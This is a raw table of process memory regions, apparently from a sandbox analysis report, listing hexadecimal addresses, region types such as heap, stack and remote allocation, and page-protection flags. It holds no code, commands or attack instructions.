||
|
B1D3C7E000
|
stack
|
page read and write
|
||
|
7290000
|
trusted library allocation
|
page read and write
|
||
|
25A73000
|
heap
|
page read and write
|
||
|
1FA329CC000
|
heap
|
page read and write
|
||
|
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
|
23760000
|
trusted library allocation
|
page read and write
|
||
|
1FA329A3000
|
heap
|
page read and write
|
||
|
25D20000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
heap
|
page read and write
|
||
|
2AF4000
|
trusted library allocation
|
page read and write
|
||
|
24B6C6C8000
|
heap
|
page read and write
|
||
|
23A20000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC49C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FA30BFC000
|
heap
|
page read and write
|
||
|
25D20000
|
trusted library allocation
|
page read and write
|
||
|
7220000
|
trusted library allocation
|
page read and write
|
||
|
C69BFFF000
|
stack
|
page read and write
|
||
|
6DDE000
|
stack
|
page read and write
|
||
|
2375E000
|
stack
|
page read and write
|
||
|
1FA32887000
|
heap
|
page read and write
|
||
|
22C90000
|
direct allocation
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
1FA30BE4000
|
heap
|
page read and write
|
||
|
23A00000
|
trusted library allocation
|
page read and write
|
||
|
24B6C600000
|
heap
|
page read and write
|
||
|
2B50000
|
heap
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
22C10000
|
direct allocation
|
page read and write
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
7450000
|
trusted library allocation
|
page read and write
|
||
|
1FA329CD000
|
heap
|
page read and write
|
||
|
7012000
|
heap
|
page read and write
|
||
|
22C40000
|
direct allocation
|
page read and write
|
||
|
25D80000
|
trusted library allocation
|
page read and write
|
||
|
7131000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA329A3000
|
heap
|
page read and write
|
||
|
1FA328C2000
|
heap
|
page read and write
|
||
|
1D496380000
|
heap
|
page read and write
|
||
|
2A3C000
|
heap
|
page read and write
|
||
|
4698000
|
trusted library allocation
|
page read and write
|
||
|
C69C0FF000
|
stack
|
page read and write
|
||
|
732F000
|
stack
|
page read and write
|
||
|
25D20000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D9E000
|
stack
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
24B5607B000
|
trusted library allocation
|
page read and write
|
||
|
B1D3B7E000
|
stack
|
page read and write
|
||
|
24B6C700000
|
heap
|
page read and write
|
||
|
72EE000
|
stack
|
page read and write
|
||
|
4470000
|
remote allocation
|
page execute and read and write
|
||
|
24B526F3000
|
heap
|
page read and write
|
||
|
25A73000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
235E0000
|
remote allocation
|
page read and write
|
||
|
9B97000
|
trusted library allocation
|
page read and write
|
||
|
23A00000
|
trusted library allocation
|
page read and write
|
||
|
84A0000
|
direct allocation
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
1FA30BCC000
|
heap
|
page read and write
|
||
|
2AF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B2A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
1FA30B31000
|
heap
|
page read and write
|
||
|
7FFAAC500000
|
trusted library allocation
|
page execute and read and write
|
||
|
24B544E8000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA30BE7000
|
heap
|
page read and write
|
||
|
7069000
|
heap
|
page read and write
|
||
|
7420000
|
trusted library allocation
|
page read and write
|
||
|
25D30000
|
trusted library allocation
|
page read and write
|
||
|
1FA3297A000
|
heap
|
page read and write
|
||
|
24B526A6000
|
heap
|
page read and write
|
||
|
1D496175000
|
heap
|
page read and write
|
||
|
2D1E000
|
stack
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
234FF000
|
stack
|
page read and write
|
||
|
25D80000
|
trusted library allocation
|
page read and write
|
||
|
2C75000
|
heap
|
page read and write
|
||
|
2FCB000
|
trusted library allocation
|
page execute and read and write
|
||
|
23829000
|
trusted library allocation
|
page read and write
|
||
|
24B54751000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC596000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA32971000
|
heap
|
page read and write
|
||
|
1FA32998000
|
heap
|
page read and write
|
||
|
25CB2000
|
trusted library allocation
|
page read and write
|
||
|
25A56000
|
heap
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
1FA328C3000
|
heap
|
page read and write
|
||
|
24B6C604000
|
heap
|
page read and write
|
||
|
24B525E0000
|
heap
|
page read and write
|
||
|
2CDE000
|
stack
|
page read and write
|
||
|
24B56062000
|
trusted library allocation
|
page read and write
|
||
|
24B6C829000
|
heap
|
page read and write
|
||
|
6D30000
|
remote allocation
|
page execute and read and write
|
||
|
836B000
|
stack
|
page read and write
|
||
|
23CC5000
|
trusted library allocation
|
page read and write
|
||
|
25A4D000
|
heap
|
page read and write
|
||
|
7E80000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C35000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F30000
|
remote allocation
|
page execute and read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
55C000
|
stack
|
page read and write
|
||
|
25CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24B54A96000
|
trusted library allocation
|
page read and write
|
||
|
7F430000
|
trusted library allocation
|
page execute and read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FA30DC5000
|
heap
|
page read and write
|
||
|
2FBA000
|
trusted library allocation
|
page execute and read and write
|
||
|
24B5473F000
|
trusted library allocation
|
page read and write
|
||
|
25D70000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
7E67000
|
stack
|
page read and write
|
||
|
8025000
|
heap
|
page read and write
|
||
|
8215000
|
trusted library allocation
|
page read and write
|
||
|
69FF000
|
stack
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
1FA3288D000
|
heap
|
page read and write
|
||
|
24B54210000
|
heap
|
page execute and read and write
|
||
|
25A73000
|
heap
|
page read and write
|
||
|
7FDF000
|
heap
|
page read and write
|
||
|
69B5000
|
heap
|
page execute and read and write
|
||
|
24B526C6000
|
heap
|
page read and write
|
||
|
26350000
|
trusted library allocation
|
page read and write
|
||
|
24B55B7C000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
|
24B6C89E000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
70DA000
|
heap
|
page read and write
|
||
|
24B54AA6000
|
trusted library allocation
|
page read and write
|
||
|
25C1D000
|
stack
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
6B60000
|
direct allocation
|
page read and write
|
||
|
1FA329E2000
|
heap
|
page read and write
|
||
|
7977000
|
heap
|
page read and write
|
||
|
25CC1000
|
trusted library allocation
|
page read and write
|
||
|
25D20000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3E2000
|
trusted library allocation
|
page read and write
|
||
|
6D4B000
|
stack
|
page read and write
|
||
|
7E77000
|
heap
|
page read and write
|
||
|
84B0000
|
direct allocation
|
page read and write
|
||
|
25A73000
|
heap
|
page read and write
|
||
|
24B5275C000
|
heap
|
page read and write
|
||
|
25A66000
|
heap
|
page read and write
|
||
|
CC6F6FF000
|
stack
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
2608D000
|
stack
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
23D2F000
|
trusted library allocation
|
page read and write
|
||
|
5541000
|
trusted library allocation
|
page read and write
|
||
|
2D5C000
|
stack
|
page read and write
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
1FA30BCD000
|
heap
|
page read and write
|
||
|
C69C4FE000
|
stack
|
page read and write
|
||
|
698E000
|
stack
|
page read and write
|
||
|
25CE0000
|
trusted library allocation
|
page read and write
|
||
|
1FA328BF000
|
heap
|
page read and write
|
||
|
22C50000
|
direct allocation
|
page read and write
|
||
|
1FA32878000
|
heap
|
page read and write
|
||
|
1FA324D0000
|
heap
|
page read and write
|
||
|
65D000
|
stack
|
page read and write
|
||
|
25DA0000
|
heap
|
page execute and read and write
|
||
|
B1D3CBE000
|
stack
|
page read and write
|
||
|
660000
|
heap
|
page read and write
|
||
|
1FA32974000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
B1D3BFE000
|
stack
|
page read and write
|
||
|
7EA0000
|
trusted library allocation
|
page read and write
|
||
|
2B1E000
|
unkown
|
page read and write
|
||
|
2D9F000
|
unkown
|
page read and write
|
||
|
24B52640000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC620000
|
trusted library allocation
|
page read and write
|
||
|
2335E000
|
stack
|
page read and write
|
||
|
1FA30BF8000
|
heap
|
page read and write
|
||
|
1FA30BE6000
|
heap
|
page read and write
|
||
|
233B0000
|
trusted library allocation
|
page read and write
|
||
|
4F1B000
|
trusted library allocation
|
page read and write
|
||
|
B1D3A7D000
|
stack
|
page read and write
|
||
|
24B5608B000
|
trusted library allocation
|
page read and write
|
||
|
22C00000
|
direct allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
23660000
|
heap
|
page read and write
|
||
|
B1D4B8B000
|
stack
|
page read and write
|
||
|
25A8F000
|
heap
|
page read and write
|
||
|
1FA30BED000
|
heap
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
25D50000
|
trusted library allocation
|
page read and write
|
||
|
6EBF1000
|
unkown
|
page execute read
|
||
|
23A20000
|
trusted library allocation
|
page read and write
|
||
|
22BF0000
|
direct allocation
|
page read and write
|
||
|
23470000
|
direct allocation
|
page read and write
|
||
|
7FFB000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
C69B9AA000
|
stack
|
page read and write
|
||
|
2F80000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
25D20000
|
trusted library allocation
|
page read and write
|
||
|
1FA32974000
|
heap
|
page read and write
|
||
|
1FA32971000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
25CAE000
|
trusted library allocation
|
page read and write
|
||
|
25CE0000
|
trusted library allocation
|
page read and write
|
||
|
84F0000
|
direct allocation
|
page read and write
|
||
|
24B54917000
|
trusted library allocation
|
page read and write
|
||
|
262CB000
|
stack
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
2A7E000
|
stack
|
page read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
1FA30BFA000
|
heap
|
page read and write
|
||
|
6EBF0000
|
unkown
|
page readonly
|
||
|
2D8E000
|
stack
|
page read and write
|
||
|
239B8000
|
stack
|
page read and write
|
||
|
24B6C66A000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
657E000
|
stack
|
page read and write
|
||
|
2C32000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
|
6B50000
|
direct allocation
|
page read and write
|
||
|
24B6C60A000
|
heap
|
page read and write
|
||
|
1FA30BF2000
|
heap
|
page read and write
|
||
|
25D10000
|
trusted library allocation
|
page read and write
|
||
|
24B56289000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC600000
|
trusted library allocation
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
2B09000
|
trusted library allocation
|
page read and write
|
||
|
B1D38FE000
|
stack
|
page read and write
|
||
|
23440000
|
direct allocation
|
page read and write
|
||
|
B710000
|
direct allocation
|
page execute and read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
|
23770000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
69B0000
|
heap
|
page execute and read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
7A2C000
|
heap
|
page read and write
|
||
|
24B526AA000
|
heap
|
page read and write
|
||
|
25CE0000
|
trusted library allocation
|
page read and write
|
||
|
2EDE000
|
stack
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
25CE0000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
2FC2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
2EDF000
|
stack
|
page read and write
|
||
|
7FFF000
|
heap
|
page read and write
|
||
|
23780000
|
trusted library allocation
|
page read and write
|
||
|
7F60000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C78000
|
trusted library allocation
|
page read and write
|
||
|
73AD000
|
stack
|
page read and write
|
||
|
25D30000
|
trusted library allocation
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
7F90000
|
trusted library allocation
|
page read and write
|
||
|
7C8E000
|
stack
|
page read and write
|
||
|
6B4B000
|
stack
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
24B54345000
|
trusted library allocation
|
page read and write
|
||
|
26990000
|
trusted library allocation
|
page read and write
|
||
|
1FA328BD000
|
heap
|
page read and write
|
||
|
22BE0000
|
direct allocation
|
page read and write
|
||
|
CC6F5FF000
|
unkown
|
page read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
7977000
|
heap
|
page read and write
|
||
|
7FF3000
|
heap
|
page read and write
|
||
|
832C000
|
stack
|
page read and write
|
||
|
1FA329D3000
|
heap
|
page read and write
|
||
|
6A7F000
|
stack
|
page read and write
|
||
|
24B52660000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
2C9E000
|
unkown
|
page read and write
|
||
|
6EC06000
|
unkown
|
page readonly
|
||
|
2F93000
|
trusted library allocation
|
page execute and read and write
|
||
|
6EC0F000
|
unkown
|
page readonly
|
||
|
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA30B0B000
|
heap
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
24B524A0000
|
heap
|
page read and write
|
||
|
233FD000
|
stack
|
page read and write
|
||
|
7FFAAC599000
|
trusted library allocation
|
page read and write
|
||
|
235E0000
|
remote allocation
|
page read and write
|
||
|
23770000
|
trusted library allocation
|
page read and write
|
||
|
1D496174000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
7E70000
|
heap
|
page read and write
|
||
|
C69BCFE000
|
stack
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
6C8E000
|
stack
|
page read and write
|
||
|
707B000
|
heap
|
page read and write
|
||
|
24B645B9000
|
trusted library allocation
|
page read and write
|
||
|
2E90000
|
heap
|
page read and write
|
||
|
24B53F50000
|
trusted library allocation
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
24AA5000
|
trusted library allocation
|
page read and write
|
||
|
23830000
|
trusted library allocation
|
page read and write
|
||
|
6BC0000
|
direct allocation
|
page read and write
|
||
|
23050000
|
heap
|
page read and write
|
||
|
2C3F000
|
unkown
|
page read and write
|
||
|
1FA309D0000
|
heap
|
page read and write
|
||
|
1FA30BF9000
|
heap
|
page read and write
|
||
|
24B5275E000
|
heap
|
page read and write
|
||
|
B1D3873000
|
stack
|
page read and write
|
||
|
9910000
|
direct allocation
|
page execute and read and write
|
||
|
24B6C6E3000
|
heap
|
page read and write
|
||
|
1FA32868000
|
heap
|
page read and write
|
||
|
22BA0000
|
direct allocation
|
page read and write
|
||
|
24B526EF000
|
heap
|
page read and write
|
||
|
24B52900000
|
heap
|
page read and write
|
||
|
24B6C800000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
260CE000
|
stack
|
page read and write
|
||
|
23A20000
|
trusted library allocation
|
page read and write
|
||
|
24B52905000
|
heap
|
page read and write
|
||
|
2FB0000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
25CF1000
|
trusted library allocation
|
page read and write
|
||
|
1FA30BE4000
|
heap
|
page read and write
|
||
|
1FA329AB000
|
heap
|
page read and write
|
||
|
2F90000
|
trusted library allocation
|
page read and write
|
||
|
24B6C825000
|
heap
|
page read and write
|
||
|
25CBA000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3FB000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
2604D000
|
stack
|
page read and write
|
||
|
4ECB000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
|
25A5C000
|
heap
|
page read and write
|
||
|
2AF0000
|
trusted library allocation
|
page read and write
|
||
|
2D9A000
|
heap
|
page read and write
|
||
|
2B62000
|
heap
|
page read and write
|
||
|
6EC06000
|
unkown
|
page readonly
|
||
|
23847000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3F0000
|
trusted library allocation
|
page read and write
|
||
|
24B542B0000
|
heap
|
page execute and read and write
|
||
|
24B53FA5000
|
heap
|
page read and write
|
||
|
7E40000
|
heap
|
page readonly
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
84C0000
|
direct allocation
|
page read and write
|
||
|
6B0D000
|
stack
|
page read and write
|
||
|
25D20000
|
trusted library allocation
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
24B526ED000
|
heap
|
page read and write
|
||
|
7440000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA3288D000
|
heap
|
page read and write
|
||
|
1FA30BED000
|
heap
|
page read and write
|
||
|
25CE0000
|
trusted library allocation
|
page read and write
|
||
|
25D30000
|
trusted library allocation
|
page read and write
|
||
|
AD10000
|
direct allocation
|
page execute and read and write
|
||
|
1FA329AC000
|
heap
|
page read and write
|
||
|
72A0000
|
heap
|
page execute and read and write
|
||
|
2343E000
|
stack
|
page read and write
|
||
|
B1D4C0B000
|
stack
|
page read and write
|
||
|
2FB6000
|
trusted library allocation
|
page execute and read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
2C5C000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
8470000
|
trusted library allocation
|
page read and write
|
||
|
25D80000
|
trusted library allocation
|
page read and write
|
||
|
24B54AFE000
|
trusted library allocation
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
55A8000
|
trusted library allocation
|
page read and write
|
||
|
23680000
|
direct allocation
|
page read and write
|
||
|
7FFAAC496000
|
trusted library allocation
|
page read and write
|
||
|
2C30000
|
trusted library allocation
|
page read and write
|
||
|
23830000
|
trusted library allocation
|
page read and write
|
||
|
1FA30BCC000
|
heap
|
page read and write
|
||
|
7DF4D3510000
|
trusted library allocation
|
page execute and read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
|
5569000
|
trusted library allocation
|
page read and write
|
||
|
1FA32887000
|
heap
|
page read and write
|
||
|
2B20000
|
trusted library allocation
|
page read and write
|
||
|
1FA30B00000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
24B6C87B000
|
heap
|
page read and write
|
||
|
6BA0000
|
direct allocation
|
page read and write
|
||
|
7F710000
|
trusted library allocation
|
page execute and read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
23790000
|
heap
|
page read and write
|
||
|
2FA3000
|
trusted library allocation
|
page read and write
|
||
|
4541000
|
trusted library allocation
|
page read and write
|
||
|
237DE000
|
stack
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
23AEA000
|
trusted library allocation
|
page read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
2628C000
|
stack
|
page read and write
|
||
|
25D50000
|
trusted library allocation
|
page read and write
|
||
|
25A66000
|
heap
|
page read and write
|
||
|
24B55901000
|
trusted library allocation
|
page read and write
|
||
|
2AE0000
|
trusted library allocation
|
page read and write
|
||
|
8048000
|
heap
|
page read and write
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
2FC0000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1D496130000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA30B32000
|
heap
|
page read and write
|
||
|
24B52650000
|
heap
|
page readonly
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
2354D000
|
stack
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA329AC000
|
heap
|
page read and write
|
||
|
6C0D000
|
stack
|
page read and write
|
||
|
6330000
|
remote allocation
|
page execute and read and write
|
||
|
2331F000
|
stack
|
page read and write
|
||
|
2321D000
|
stack
|
page read and write
|
||
|
4EE1000
|
trusted library allocation
|
page read and write
|
||
|
2381C000
|
stack
|
page read and write
|
||
|
70F8000
|
trusted library allocation
|
page read and write
|
||
|
25DB1000
|
heap
|
page read and write
|
||
|
2325E000
|
stack
|
page read and write
|
||
|
269D000
|
stack
|
page read and write
|
||
|
232DE000
|
stack
|
page read and write
|
||
|
7FFAAC5D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A9F000
|
heap
|
page read and write
|
||
|
24B6C881000
|
heap
|
page read and write
|
||
|
24B5550B000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
24B56067000
|
trusted library allocation
|
page read and write
|
||
|
25CC6000
|
trusted library allocation
|
page read and write
|
||
|
1D4961BB000
|
heap
|
page read and write
|
||
|
1FA329CA000
|
heap
|
page read and write
|
||
|
1FA30DC0000
|
heap
|
page read and write
|
||
|
23450000
|
direct allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
6A3E000
|
stack
|
page read and write
|
||
|
23A30000
|
heap
|
page execute and read and write
|
||
|
B1D4A8E000
|
stack
|
page read and write
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
7F70000
|
trusted library allocation
|
page read and write
|
||
|
7F4E000
|
stack
|
page read and write
|
||
|
2AC0000
|
heap
|
page read and write
|
||
|
7FFAAC5B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FA3288D000
|
heap
|
page read and write
|
||
|
25D80000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
6EC0F000
|
unkown
|
page readonly
|
||
|
B1D3AFF000
|
stack
|
page read and write
|
||
|
24B53F20000
|
trusted library allocation
|
page read and write
|
||
|
1FA3298C000
|
heap
|
page read and write
|
||
|
24B5609C000
|
trusted library allocation
|
page read and write
|
||
|
23845000
|
trusted library allocation
|
page read and write
|
||
|
B1D39FE000
|
stack
|
page read and write
|
||
|
1FA30AD0000
|
heap
|
page read and write
|
||
|
1FA30B71000
|
heap
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D496110000
|
heap
|
page read and write
|
||
|
24B547A9000
|
trusted library allocation
|
page read and write
|
||
|
7F50000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
23A28000
|
trusted library allocation
|
page read and write
|
||
|
C69C3FE000
|
stack
|
page read and write
|
||
|
7FFAAC490000
|
trusted library allocation
|
page read and write
|
||
|
70CF000
|
heap
|
page read and write
|
||
|
1FA30B15000
|
heap
|
page read and write
|
||
|
7FFAAC5C2000
|
trusted library allocation
|
page read and write
|
||
|
25DB0000
|
heap
|
page read and write
|
||
|
1FA32978000
|
heap
|
page read and write
|
||
|
1FA32973000
|
heap
|
page read and write
|
||
|
25A6A000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
25D80000
|
trusted library allocation
|
page read and write
|
||
|
24B526AE000
|
heap
|
page read and write
|
||
|
2D90000
|
heap
|
page read and write
|
||
|
25D30000
|
trusted library allocation
|
page read and write
|
||
|
6FDE000
|
stack
|
page read and write
|
||
|
24B542C1000
|
trusted library allocation
|
page read and write
|
||
|
2C90000
|
heap
|
page execute and read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA32872000
|
heap
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
4EBF000
|
trusted library allocation
|
page read and write
|
||
|
25CF1000
|
trusted library allocation
|
page read and write
|
||
|
1FA30BF0000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
23718000
|
stack
|
page read and write
|
||
|
C69C5FB000
|
stack
|
page read and write
|
||
|
24B642C1000
|
trusted library allocation
|
page read and write
|
||
|
25A7D000
|
heap
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
2397A000
|
stack
|
page read and write
|
||
|
7730000
|
remote allocation
|
page execute and read and write
|
||
|
6E50000
|
heap
|
page read and write
|
||
|
79B0000
|
heap
|
page read and write
|
||
|
24B549E1000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
25D30000
|
trusted library allocation
|
page read and write
|
||
|
2B8D000
|
stack
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
2B6E000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
24B6C852000
|
heap
|
page read and write
|
||
|
1FA32980000
|
heap
|
page read and write
|
||
|
7257000
|
trusted library allocation
|
page read and write
|
||
|
1FA32860000
|
heap
|
page read and write
|
||
|
1FA328BE000
|
heap
|
page read and write
|
||
|
24B56087000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
8220000
|
trusted library allocation
|
page read and write
|
||
|
56CE000
|
trusted library allocation
|
page read and write
|
||
|
2361E000
|
stack
|
page read and write
|
||
|
599000
|
stack
|
page read and write
|
||
|
24B54AD2000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
24B54AE8000
|
trusted library allocation
|
page read and write
|
||
|
770000
|
trusted library section
|
page read and write
|
||
|
24B52580000
|
heap
|
page read and write
|
||
|
7026000
|
heap
|
page read and write
|
||
|
25A6D000
|
heap
|
page read and write
|
||
|
6CCB000
|
stack
|
page read and write
|
||
|
1FA30AB0000
|
heap
|
page read and write
|
||
|
2ABF000
|
stack
|
page read and write
|
||
|
7022000
|
heap
|
page read and write
|
||
|
73D0000
|
trusted library allocation
|
page read and write
|
||
|
8F10000
|
direct allocation
|
page execute and read and write
|
||
|
6D0D000
|
stack
|
page read and write
|
||
|
83AE000
|
stack
|
page read and write
|
||
|
2C60000
|
heap
|
page readonly
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
22C70000
|
direct allocation
|
page read and write
|
||
|
6B80000
|
direct allocation
|
page read and write
|
||
|
24B6C830000
|
heap
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
2624D000
|
stack
|
page read and write
|
||
|
1FA30BFA000
|
heap
|
page read and write
|
||
|
23A20000
|
trusted library allocation
|
page read and write
|
||
|
25CD2000
|
trusted library allocation
|
page read and write
|
||
|
22C20000
|
direct allocation
|
page read and write
|
||
|
24B6C8A6000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
B1D3FBE000
|
stack
|
page read and write
|
||
|
230DE000
|
stack
|
page read and write
|
||
|
24B6C668000
|
heap
|
page read and write
|
||
|
2BF7000
|
heap
|
page read and write
|
||
|
2FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23840000
|
trusted library allocation
|
page read and write
|
||
|
